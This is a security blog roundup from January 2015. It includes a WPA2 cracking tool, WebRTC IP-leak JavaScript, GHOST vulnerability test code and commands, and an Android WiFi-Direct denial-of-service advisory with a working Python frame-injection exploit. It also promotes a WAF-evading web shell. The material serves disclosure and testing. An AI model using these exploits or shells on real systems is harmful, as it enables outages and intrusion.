CVE Feeds

Jan 29, 2015

Tools: WPA2 HalfHandshake Crack

Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client within range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake.

$ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"


Source:: http://n0where.net/wpa2-halfhandshake-crack/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Reveal Real IP Of Firefox and Chrome

Firefox and Chrome have implemented WebRTC that allow requests to STUN servers be made that will return the local and public IP addresses for the user. These request results are available to javascript, so you can now obtain a users local and public IP addresses in javascript. This demo is an example implementation of that.
Additionally, these STUN requests are made outside of the normal XMLHttpRequest procedure, so they are not visible in the developer console or able to be blocked by plugins such as AdBlockPlus or Ghostery. This makes these types of requests available for online tracking if an advertiser sets up a STUN server with a wildcard domain.


//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events
        if(ice.candidate){

            //match just the IP address
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
            var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

            //remove duplicates
            if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);

            ip_dups[ip_addr] = true;
        }
    };

    //create a bogus data channel
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){

        //trigger the stun server request
        pc.setLocalDescription(result, function(){});

    }, function(){});
}

//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});
 


Source:: https://github.com/diafygi/webrtc-ips



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Hipara - HIPS with Yara

Host intrusion prevention with the power of Yara

Source:: https://github.com/jbc22/hipara


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: Shmoocon 2015 Videos: Playlist Version (January 2015)

Link:: https://archive.org/details/shmoocon-2015-videos-playlist


 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Hopper - Debug Application and Library in same time.

Hopper 3.7.3 is available. The most important feature of this release is the ability to debug multiple documents at once!
For instance, it is now possible to open a document with the main executable of an application, and another document with a framework used by the application. When you set breakpoints in these two documents, and launch the debugger, Hopper will make its best to show the correct document containing the current PC value

Source:: http://hopperapp.com/blog/?p=136



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Test GHOST Vulnerability and resource of its

Check Vulnerability
1. Test with code from Qualys(http://www.openwall.com/lists/oss-security/2015/01/27/9) or download from http://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c

# wget "http://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c"

# gcc -o ghost GHOST.c
# ./ghost

###### Source code here
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
    puts("vulnerable");
    exit(EXIT_SUCCESS);
  }
  if (retval == ERANGE) {
    puts("not vulnerable");
    exit(EXIT_SUCCESS);
  }
  puts("should not happen");
  exit(EXIT_FAILURE);
}

###### End of Source code.
if it echo "vulnerable" that means your linux has GHOST vulnerable, if not and it echo "not vulnerable" that mean your linux is safe.

2. Check from version of glibc
# ldd --version
if you're Debian/Ubuntu guys, you must have glibc > glibc 2.18

If you're CentOS/Redhat Enterprise Linux, you must have glibc 2.12-1.149
3. Check with php
# php -r '$e="0";for($i=0;$i<2500;$i++){$e="0$e";} gethostbyname($e);'
if it's segmentation fault, it means you're vulnerable.

4. Check which application that use glibc library
# lsof | grep libc | awk '{print $1}' | sort | uniq

How to fix
1. Debian/Ubuntu
Fix with 
# apt-get update && apt-get upgrade && apt-get dist-upgrade

2. CentOS/Redhat Enterprise Linux
Fix with 
# yum clean all && yum update

Source:: 
-    http://www.frsag.org/pipermail/frsag/2015-January/005722.html
-    https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability
-    http://www.beej.us/guide/bgnet/output/html/multipage/gethostbynameman.html
-    http://man7.org/linux/man-pages/man3/gethostbyname.3.html
-    http://lcamtuf.blogspot.co.uk/2015/01/technical-analysis-of-qualys-ghost.html
-    http://www.openwall.com/lists/oss-security/2015/01/27/9
-    http://www.cyberciti.biz/faq/cve-2015-0235-patch-ghost-on-debian-ubuntu-fedora-centos-rhel-linux/
 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 27, 2015

Android WiFi-Direct Denial of Service

Android WiFi-Direct Denial of Service


1. *Advisory Information*

Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release


2. *Vulnerability Information*

Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997


3. *Vulnerability Description*

   Some Android devices are affected by a Denial of Service attack when
   scanning for WiFi Direct devices.

   An attacker could send a specially crafted 802.11 Probe Response frame
   causing the Dalvik subsystem to reboot because of an Unhandle Exception
   on WiFiMonitor class.


4. *Vulnerable Packages*

   . Nexus 5 - Android 4.4.4
   . Nexus 4 - Android 4.4.4
   . LG D806 - Android 4.2.2
   . Samsung SM-T310 - Android 4.2.2
   . Motorola RAZR HD - Android 4.1.2

   Other devices could be also affected.


5. *Non-vulnerable packages*

   . Android 5.0.1
   . Android 5.0.2


6. *Vendor Information, Solutions and Workarounds*

   Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
   Contact vendor for further information.

7. *Credits*

   This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
   Team. The publication of this advisory was coordinated by the Core
Advisories
   Team.


8. *Technical Description / Proof of Concept Code*


   Android makes use of a modified *wpa_supplicant*[1]
   in order to provide an interface between the wireless driver and the
Android platform framework.

   Below the function that handles *wpa_supplicant* events. This function
   returns a jstring from calling NewStringUTF method.

/-----
    static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
    {
        char buf[EVENT_BUF_SIZE];
        int nread = ::wifi_wait_for_event(buf, sizeof buf);
        if (nread > 0) {
            return env->NewStringUTF(buf);
        } else {
        return NULL;
        }
    }
-----/

   The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P
   devices to exchange device information, the device name is part of
this information.

   The WifiP2pDevice class, located at
/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,
   represents a Wi-Fi p2p device. The constructor method receives the
string provided by
   the *wpa_supplicant* and throws an IllegalArgumentException in case
   the event is malformed.

   Below partial content of the WiFiP2PDevice.java file.

/-----
        [...]

        /** Detailed device string pattern with WFD info
         * Example:
         *  P2P-DEVICE-FOUND 00:18:6b:de:a3:6e
p2p_dev_addr=00:18:6b:de:a3:6e
         *  pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'
config_methods=0x188
         *  dev_capab=0x21 group_capab=0x9
         */
        private static final Pattern detailedDevicePattern =
Pattern.compile(
            "((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
            "(\\d+ )?" +
            "p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
            "pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
            "name='(.*)' " +
            "config_methods=(0x[0-9a-fA-F]+) " +
            "dev_capab=(0x[0-9a-fA-F]+) " +
            "group_capab=(0x[0-9a-fA-F]+)" +
            "( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
        );

        [...]

        /**
         * @param string formats supported include
         *  P2P-DEVICE-FOUND fa:7b:7a:42:02:13
p2p_dev_addr=fa:7b:7a:42:02:13
         *  pri_dev_type=1-0050F204-1 name='p2p-TEST1'
config_methods=0x188 dev_capab=0x27
         *  group_capab=0x0 wfd_dev_info=000006015d022a0032
         *
         *  P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
         *
         *  AP-STA-CONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
         *
         *  AP-STA-DISCONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
         *
         *  fa:7b:7a:42:02:13
         *
         *  Note: The events formats can be looked up in the
wpa_supplicant code
         * @hide
         */
        public WifiP2pDevice(String string) throws
IllegalArgumentException {
            String[] tokens = string.split("[ \n]");
            Matcher match;

            if (tokens.length < 1) {
                throw new IllegalArgumentException("Malformed supplicant
event");
            }

            switch (tokens.length) {
                case 1:
                    /* Just a device address */
                    deviceAddress = string;
                    return;
                case 2:
                    match = twoTokenPattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed
supplicant event");
                    }
                    deviceAddress = match.group(2);
                    return;
                case 3:
                    match = threeTokenPattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed
supplicant event");
                    }
                    deviceAddress = match.group(1);
                    return;
                default:
                    match = detailedDevicePattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed
supplicant event");
                    }

                    deviceAddress = match.group(3);
                    primaryDeviceType = match.group(4);
                    deviceName = match.group(5);
                    wpsConfigMethodsSupported = parseHex(match.group(6));
                    deviceCapability = parseHex(match.group(7));
                    groupCapability = parseHex(match.group(8));
                    if (match.group(9) != null) {
                        String str = match.group(10);
                        wfdInfo = new
WifiP2pWfdInfo(parseHex(str.substring(0,4)),
                                parseHex(str.substring(4,8)),
                                parseHex(str.substring(8,12)));
                    }
                    break;
            }

            if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
                status = AVAILABLE;
            }
        }

        [...]
-----/

   On some Android devices when processing a probe response frame with a
WiFi-Direct(P2P)
   information element that contains a device name attribute with
specific bytes generates
   a malformed supplicant event string that ends up throwing the
IllegalArgumentException.
   As this exception is not handled the Android system restarts.

   Below partial content of the logcat of a Samsung SM-T310 running
Android 4.2.2.

/-----
      I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5  'fa¬¬'
config_methods=0x188 dev_capab=0x21 group_capab=0x0
      E/AndroidRuntime( 2129): ! () *** FATAL EXCEPTION IN SYSTEM PROCESS:
WifiMonitor
      E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:
Malformed supplicant event
      E/AndroidRuntime( 2129):        at
android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
      E/AndroidRuntime( 2129):        at
android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
      E/AndroidRuntime( 2129):        at
android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
      E/android.os.Debug( 2129): ! () Dumpstate > dumpstate -k -t -z -d -o
/data/log/dumpstate_sys_error
-----/


8.1. *Proof of Concept*


   This PoC was implemented using the open source library Lorcon
   [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

/-----
    #!/usr/bin/env python

    import sys
    import time
    import struct
    import PyLorcon2


    def get_probe_response(source, destination, channel):
        frame = str()
        frame += "\x50\x00"  # Frame Control
        frame += "\x00\x00"  # Duration
        frame += destination
        frame += source
        frame += source
        frame += "\x00\x00"  # Sequence Control
        frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
        frame += "\x64\x00"  # Beacon Interval
        frame += "\x30\x04"  # Capabilities Information

        # SSID IE
        frame += "\x00"
        frame += "\x07"
        frame += "DIRECT-"

        # Supported Rates
        frame += "\x01"
        frame += "\x08"
        frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"

        # DS Parameter Set
        frame += "\x03"
        frame += "\x01"
        frame += struct.pack("B", channel)

        # P2P
        frame += "\xDD"
        frame += "\x27"
        frame += "\x50\x6F\x9A"
        frame += "\x09"
        # P2P Capabilities
        frame += "\x02" # ID
        frame += "\x02\x00" # Length
        frame += "\x21\x00"
        # P2P Device Info
        frame += "\x0D" # ID
        frame += "\x1B\x00" # Length
        frame += source
        frame += "\x01\x88"
        frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
        frame += "\x00"
        frame += "\x10\x11"
        frame += "\x00\x06"
        frame += "fafa\xFA\xFA"

        return frame


    def str_to_mac(address):
        return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print "Usage:"
            print "  poc.py <iface> <target>"
            print "Example:"
            print "  poc.py wlan0 00:11:22:33:44:55"
            sys.exit(-1)

        iface = sys.argv[1]
        destination = str_to_mac(sys.argv[2])

        context = PyLorcon2.Context(iface)
        context.open_injmon()

        channel = 1
        source = str_to_mac("00:11:22:33:44:55")
        frame = get_probe_response(source, destination, channel)

        print "Injecting PoC."
        for i in range(100):
            context.send_bytes(frame)
            time.sleep(0.100)
-----/ 
 
 
Source:: http://seclists.org/fulldisclosure/2015/Jan/104 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 26, 2015

Tools: sshttp - hiding SSH servers behind HTTP

In case your FW policy forbids SSH access to the DMZ or internal network from outside, but you still want to use ssh on machines which only have one open port, e.g. HTTP, you can use sshttpd.
sshttpd can multiplex the following protocol pairs:
  • SSH/HTTP
  • SSH/HTTPS
  • SSH/SMTP (without SMTP multiline banners)
Source:: https://github.com/stealth/sshttp


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Advanced Web Shell

There's multiple things that makes DAws better than every Web Shell out there:
  1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for Downloading a File from a Link, if Curl was disabled then file_get_content is used instead and this Feature is widely used in every section and fucntion of the shell.
  2. Automatic Random Encoding; DAws randomly encodes automatically most of your GET and POST data using Java Script or PHP which will allow your shell to Bypass pretty much every WAF out there.
  3. Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main Feature is that everything is dynamically printed; the permissions of every File and Folder are checked, now, the functions that can be used will be available based on these permissions, this will save time and make life much easier.
  4. Tools: DAws holds bunch of useful tools such as "bpscan" which can identify useable and unblocked ports on the server within few minutes which can later on allow you to go for a bind shell for example.
  5. Everything that can't be used at all will be simply removed so Users do not have to waste their time. We're for example mentioning the execution of c++ scripts when there's no c++ compilers on the server(DAws would have checked for multiple compilers in the first place) in this case, the function would be automatically removed and the User would know.
  6. Supports Windows and Linux.
  7. Openned Source.
Source:: https://github.com/dotcppfile/DAws


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: malwaRE- Malware repository framework

Malware exist with different behavior and many security research teams install distributed honeypots to detect new malwares. the honeypots will emulate vulnerable services that attract malwares and  they help to catch new binaries. if you are in the malware research field you can take a look at malwaRE project.
malwaRE is a malware repository that helps researchers to store their samples for further analysis or to keep track of any old samples that will be needed in the future. some of the features are:
  • Self-hosted solution (PHP/Mysql server needed)
  • VirusTotal results (option for uploading unknown samples)
  • Search filters available (vendor, filename, hash, tag)
  • Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
  • Add writeup url(s) for each sample
  • Manage samples by tag
  • Tag autocomplete
  • VirusTotal rescan button (VirusTotal’s score column)
  • Download samples from repository
Source:: http://www.sectechno.com/malware-malware-repository-framework/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |